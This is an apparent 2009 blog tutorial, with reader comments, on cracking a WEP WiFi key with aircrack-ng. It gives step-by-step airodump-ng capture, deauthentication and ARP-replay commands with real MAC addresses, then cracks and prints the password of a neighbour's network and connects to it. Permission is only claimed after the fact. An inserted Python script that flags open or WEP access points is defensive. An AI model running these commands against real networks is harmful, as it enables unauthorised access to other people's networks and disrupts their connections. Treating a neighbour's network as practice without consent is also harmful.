Cracking WiFi WEP keys

Hi, this simple tutorial is for cracking WEP WiFi keys.

My gear:

Lenovo IBM ThinkPad T60 with the embedded Intel wireless card (a normal WiFi card)

Ubuntu 9.04 32bit

My practice target:

The WiFi AP in the house next to mine, belonging to a UTP practical student :D

OK, let's start:

1. First, because this is not BackTrack, I'm going to have to install aircrack-ng:

sudo apt-get install aircrack-ng

Then use Kismet or 'iwlist' to search for (or wardrive for) WiFi access points. In my case I don't wardrive, I'm just sitting in my room :)

2. In this example, I'm using iwlist:

sudo iwlist wlan0 scanning

salax@salax-laptop:~$ sudo iwlist wlan0 scanning
wlan0 Scan completed :
Cell 01 - Address: 00:1C:DF:CD:84:74
ESSID:"Soul Society"
Mode:Master
Channel:6
Frequency:2.437 GHz (Channel 6)
Quality=74/100 Signal level:-60 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 000C536F756C20536F6369657479
IE: Unknown: 010882848B962430486C
IE: Unknown: 030106
IE: Unknown: 2A0100
IE: Unknown: 2F0100
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: Unknown: 32040C121860
IE: Unknown: DD970050F204104A0001101044000
IE: Unknown: DD090010180200F0000000
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: Unknown: DD180050F2020101800003A4000027A4000042435E0062322F00
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
12 Mb/s; 48 Mb/s
Extra:tsf=0000001b713e8183
Extra: Last beacon: 460ms ago
Cell 02 - Address: 00:1E:40:DD:81:60
ESSID:"PETRONAS1"
Mode:Master
Channel:10
Frequency:2.457 GHz (Channel 10)
Quality=51/100 Signal level:-78 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 0009504554524F4E415331
IE: Unknown: 010482848B96
IE: Unknown: 03010A
IE: Unknown: DD060010180205F0
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
Extra:tsf=00000000b2840fc4
Extra: Last beacon: 328ms ago
Cell 03 - Address: CE:9F:F0:61:B3:05
ESSID:"mariam"
Mode:Ad-Hoc
Channel:10
Frequency:2.457 GHz (Channel 10)
Quality=48/100 Signal level:-80 dBm Noise level=-97 dBm
Encryption key:off
IE: Unknown: 00066D617269616D
IE: Unknown: 010882848B960C183048
IE: Unknown: 03010A
IE: Unknown: 06020000
IE: Unknown: 2A0107
IE: Unknown: 32041224606C
IE: Unknown: DD070050F202000100
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=000000053cd9d3d6
Extra: Last beacon: 280ms ago
Cell 04 - Address: 00:21:91:35:0F:1B
ESSID:"Starbucks"
Mode:Master
Channel:6
Frequency:2.437 GHz (Channel 6)
Quality=45/100 Signal level:-82 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 0009537461726275636B73
IE: Unknown: 010882848B0C12961824
IE: Unknown: 030106
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: Unknown: DD0900037F01010060FF7F
IE: Unknown: DD050050F20500
IE: Unknown: DD750050F204104A0001101
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=000000a10cbf6181
Extra: Last beacon: 472ms ago
Cell 05 - Address: 00:1E:40:66:67:29
ESSID:"Streamyx Mobility"
Mode:Master
Channel:11
Frequency:2.462 GHz (Channel 11)
Quality=45/100 Signal level:-82 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 001153747265616D7978204D6F62696C697479
IE: Unknown: 010882848B962430486C
IE: Unknown: 03010B
IE: Unknown: 2A0104
IE: Unknown: 2F0104
IE: Unknown: 32040C121860
IE: Unknown: DD060010180200F4
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
12 Mb/s; 48 Mb/s
Extra:tsf=00000001118f4184
Extra: Last beacon: 136ms ago

OK, look at the output and focus on the channel of the target AP. Note that PETRONAS1 shows "Encryption key:on" but no WPA or WPA2 IE, which is what a WEP network looks like in this listing. In this example, I'm choosing channel 10 for my practice.
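Reading a scan like the one above by hand is error-prone, so here is an added example (not from the original post) that parses iwlist output into one record per cell and flags the cells that are open or still on WEP, which is the check a defender would run against their own access points. The scan text, SSIDs and MAC addresses inside it are constructed, not taken from the post's real scan.

```python
import re

# Constructed sample in the format of 'sudo iwlist wlan0 scanning' (not the post's real scan)
SAMPLE_SCAN = """\
wlan0     Scan completed :
          Cell 01 - Address: 00:11:22:33:44:55
                    ESSID:"HomeAP"
                    Channel:6
                    Encryption key:on
                    IE: IEEE 802.11i/WPA2 Version 1
          Cell 02 - Address: 66:77:88:99:AA:BB
                    ESSID:"LegacyAP"
                    Channel:10
                    Encryption key:on
                    IE: Unknown: 03010A
          Cell 03 - Address: CC:DD:EE:FF:00:11
                    ESSID:"CoffeeShop"
                    Channel:11
                    Encryption key:off
"""

def classify(cell: dict) -> str:
    """WEP is 'Encryption key:on' with no decoded WPA/RSN IE (as for PETRONAS1 in the post)."""
    if not cell["encrypted"]:
        return "OPEN"
    ies = " ".join(cell["ies"])
    return "WPA2" if "WPA2" in ies else "WPA" if "WPA Version" in ies else "WEP"

def parse_iwlist(text: str) -> list:
    cells = []  # one dict per 'Cell NN' block; the header line matches no prefix and is skipped
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"Cell \d+ [-\u2013] Address: ([0-9A-Fa-f:]{17})", line)
        if m:
            cells.append({"bssid": m.group(1).upper(), "essid": "", "channel": 0, "encrypted": False, "ies": []})
        elif line.startswith("ESSID:"):
            cells[-1]["essid"] = line[6:].strip('"')
        elif line.startswith("Channel:"):
            cells[-1]["channel"] = int(line[8:])
        elif line.startswith("Encryption key:"):
            cells[-1]["encrypted"] = line.endswith("on")
        elif line.startswith("IE:") and "Unknown" not in line:
            cells[-1]["ies"].append(line)  # keep only IEs iwlist could decode (WPA / WPA2)
    return cells

def weak_aps(cells: list) -> list:
    """APs an audit should flag: open, or still on WEP."""
    return [(c["essid"], c["bssid"], c["channel"], sec) for c in cells
            if (sec := classify(c)) in ("OPEN", "WEP")]
```

Feed it the saved output of your own scan and anything it returns is an AP whose security should be upgraded to WPA2.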

3. Now, execute the command below:

sudo airodump-ng -w capture -c 10 wlan0

Now you should see something like this:

[screenshot: aircrack]

If you get an error, it means your WiFi adapter is busy or already connected to an AP; run the command below. If you don't have any problem, just proceed with step 7.

4. Run:

sudo airmon-ng start wlan0

and check the output for the mode enabled:

5. The output:

Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon0)

This actually created another interface, mon0.

6. If you had the previous error, run airodump-ng again with the new interface:

sudo airodump-ng -w capture -c 10 mon0

If you didn't have the error, just proceed with wlan0.

Leave it running for a while. Focus on the MAC address of your desired AP and notice the data count increasing.

7. Now, open a new tab in the console and type:

sudo aireplay-ng -e PETRONAS1 -a 00:1E:40:DD:81:60 -c 00:19:D2:00:E6:37 --deauth 10 wlan0

-a 00:1E:40:DD:81:60 : MAC address of the targeted AP (PETRONAS1)
-c 00:19:D2:00:E6:37 : MAC address of a machine connected to the targeted AP (this can be seen in the airodump-ng output in the previous tab).
From this command, you can see the output:

[screenshot: deauth]

8. Then, open another tab and type:

sudo aireplay-ng --arpreplay -b 00:1E:40:DD:81:60 -h 00:19:D2:00:E6:37 wlan0

-b 00:1E:40:DD:81:60 : MAC address of the targeted AP
-h 00:19:D2:00:E6:37 : MAC address of the machine connected to the AP
Run the command and you can see it searching for packets. Here you can see the connection between the targeted AP and the machine connected to it:

[screenshot: airreplay]

9. Lastly, open another tab and type:

sudo aircrack-ng -f 4 -m 00:1E:40:DD:81:60 -n 128 capture.cap

-m 00:1E:40:DD:81:60 : the targeted MAC address
-n 128 : the key length. Here I'm using 128-bit key encryption, assuming you know, guess or search for the key length of the targeted WEP network. Below is aircrack-ng pwning/decoding the key:

[screenshot: testing pwne]

10. Let it run and leave it until it finds the key, i.e. until the packets captured are enough to decrypt
the key. The longer/more complicated the passphrase, the more time it takes to crack it.. So in my case, I waited for about 10 minutes.. Lucky me :)

Password : petronas12345

P/S: this is for educational purposes; my neighbour has been informed about this and they have changed their passphrase to a new and stronger password.

[screenshot: Password found]

Now, to test it, try to connect:

Success!

[screenshot: petronastest]

Here we see how a simple and lame passphrase can be abused by others. So make it long and complicated, not easy to guess.

If your Internet connection is slow, someone may be riding on it behind your back :)

Author: salawank on November 4, 2009
7 responses to "Cracking WiFi WEP keys"
  1. d3t0n4t0r says:

    Nice tutorial. Hope to have some time to try it out.

  2. salawank says:

    Yep.. trying it with WPA-PSK is gonna take a long time.. if anyone knows a better way of doing this (WEP and WPA), it is welcome!

  3. The cracking part does not rely on the length of the password but on the data collected. The more data you have, the faster you'll be able to crack it :)
    On the other hand, you won't be able to crack anything without enough data... so if you failed, try collecting more data.

  4. salawank says:

    Thanks si kacak tampan macho for the heads up! :) Which means I'm lucky that the data captured was enough to crack it.. :)

  5. bublers says:

    Thanks for sharing dude, approved your comment :D

    bublers
    http://bublers.bub.my

  6. niko says:

    Thanks for the info, bro.. I didn't study IT... I just dive straight in with Mr. Google... it's good to share this information too..
